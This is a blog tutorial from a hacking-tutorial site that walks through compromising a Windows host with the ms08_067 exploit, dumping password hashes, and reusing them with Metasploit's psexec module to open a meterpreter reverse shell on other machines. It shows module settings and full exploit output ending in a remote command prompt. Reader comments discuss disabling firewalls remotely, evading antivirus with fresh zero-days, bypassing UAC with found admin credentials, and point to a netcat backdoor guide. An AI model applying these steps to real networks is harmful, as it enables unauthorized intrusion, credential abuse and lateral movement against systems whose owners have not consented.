Using PsEXEC with Metasploit to Login Using Password Hash
Type: Tutorial
Level: Medium, Advanced
The main problem of people nowadays with password it’s hard to remember, that’s why they usually put the same password for every account and even for every device they have. For example if you’re in school, university, or office when they have a lot of computer, it’s impossible to give different password to every computer especially when the person who use the computer are not familiar with computer, that’s why usually they use same password for all of the computer, because when there’s some problem happen, the IT person will try to maintain it or remote it using template password they already provided.
In this tutorial, we will compromise one victim computer and then get their password hash, after that we log in into another computer(with the same password) by using password hash, no need to cracking the password first to plain text 
Requirement :
2. Linux Operating System or Backtrack 5(Metasploit framework already included inside this distro)
Step By Step :
1. First of all you should have vulnerable target, and then set your payload to run meterpreter when the exploit successfully launched. You can view my previous post about meterpreter search(see on step 1). In this example I use exploit/windows/smb/ms08_067_netapi exploit.
2. After successfully inside victim computer, we will get the password hash.
FYI : in this case I will use the username : victim and assume that all username in that place is also victim(but it’s usually using username : Administrator)
3. Okay, after we get the victim password hashes, we will try to connect to another victim that “maybe” use the same password(or maybe they are in the same network :-p ). I will use psexec here and set the payload to use meterpreter reverse_tcp.
4. You can take a look what options does this exploit and payload has by running show options.
msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
Legends :
RHOST = remote host or target ip address
SMBPass = password hash
SMBUser = username
LHOST = our local computer use to attack
5. That’s the options we need to set up and below is my configuration on my backtrack 5 box.
6. After everything is set up correctly, then launch the exploit command.
msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.8.90:4444 [*] Connecting to the server... [*] Authenticating to 192.168.8.95:445|WORKGROUP as user 'victim'... [*] Uploading payload... [*] Created \hMnZxVRG.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hMnZxVRG.exe... [*] Sending stage (752128 bytes) to 192.168.8.95 [*] Meterpreter session 2 opened (192.168.8.90:4444 -> 192.168.8.95:1068) at 2011-07-16 01:26:24 +0800 meterpreter > shell Process 1876 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Below is my screenshot :
Thats it! We’re already on another computer. We successfully connect to a seperate computer with the same credentials without having to worry about cracking the password.
hope it’s useful.
Incoming search terms:
- Metasploit Remote Desktop Exploit-Backtrack 5
- error: dcerpc fault => nca_s_fault_ndr
- cracking windows xp password metasploit
- remote exploit windows 7 ultimate 7601 service pack 1
- wp admin pass
- smb windows 7 admin$ hack
- pass hash metasploit
- metasploit get password hash
- Capturing Windows login password with metasploit
- use of metasploit to get password hash
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
10 Responsesto “Using PsEXEC with Metasploit to Login Using Password Hash”
Trackbacks/Pingbacks
- Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] Login Windows Using PsExec Hash [...]
Leave a Reply
Links
Get Updates via Networkedblogs
awesome post.. thanks a lot
I tried everything… and no luck
[*] Creating a new service (MpAgHiEE – “MIgX”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[-] Error: DCERPC FAULT => nca_s_fault_ndr
[*] Exploit completed, but no session was created.
Can you help me?
#Amigo
what’s this? PsExec with metasploit?
Yes… (exploit/windows/smb/psexec)
BTW… i found the problem, a firewall
How do you disable a firewall (not windows firewall) remotely?
thank you for your time.
#Amigo
I have no idea for that, there’s more than a hundred or more firewall available on the net with different behavior.
I encountered this problem. Turn off the fire wall remotely via Windows Maager then connect to that machine via host name. However, in a pure windows environment (YOU MUST KNOW THE PASSWORD) on the remote machine. Be aware that there are DOS commands you can use to turn off a firewall remotely, however it can not be done directly. Using pure windows tools and nothing else, it is unlikely the firewall will get turned off unless your target is using an admin account and you trick them into executing a program or batch file of sorts, but wait. If there is an antivirus program running, it will more likely stop this action. A good estimate would be that 99% of any action without more advance tools will get stopped. Experimenting in a lab of hard knocks and solving real world problems when you MUST access a remote machine in another city, state or across the world truly tests admin’s every day. What is interesting here is, there are a series of facts that have been left out that truly require a lab environment to test. I must commend the web master for bringing to lite this information, no matter how old it is. When you see something be sure to share it with your friends who are interested in the details. Understanding the details will give you a better knowledge of why.
#James
Hi James, yes all the tutorial here you need to test first in your own lab. Your analysis was correct, because most of AV will catch it as a virus. If you want some exploit that not detected by antivirus, maybe you can find exploit with zeroday status and it just fresh come out from the oven, so you need to run fast before the AV detect it.
Because every exploit or vulnerability that come out or being written in the internet all the human(who use internet) in this world will see that information, including the antivirus company that will be ended with “patch” of that exploit and vulnerability.
Hello ,Good Morning
I need the help from you . For now i had a hard problem in Windows 7UAC.
The details as following :
I used msf/scanner/smb/smb_login in, i found USENAME : administrator , PASS WORD : 1234qwer.
Then i wan to link in my goal (windows 7(6.1.7601 Service Pack 1 Build 7601) ) . But i have to create the shell or use psexec. It is great pity that it is not work because UAC reason.
Can you tell me how to create the shell or upload payload ?Many thanks for your help in advance
#c4bbage
you can view the tutorial here : http://www.hacking-tutorial.com/tips-and-trick/13-metasploit-meterpreter-file-system-command-you-should-know/ or here http://www.hacking-tutorial.com/hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/
This week and last I did some extensive work with psexec and discovered while at work in a secured environment (Antivirus) has to be turned off and to remote execute the share has to be active and you have to be admin on both machines or submit a password for using an account on the remote machine. I believe everything we learn here requires a network with no antivirus software activated because in the real world or at least my world, some of these things will not work. Unless your antivirus program is AVG- I’m just sayin~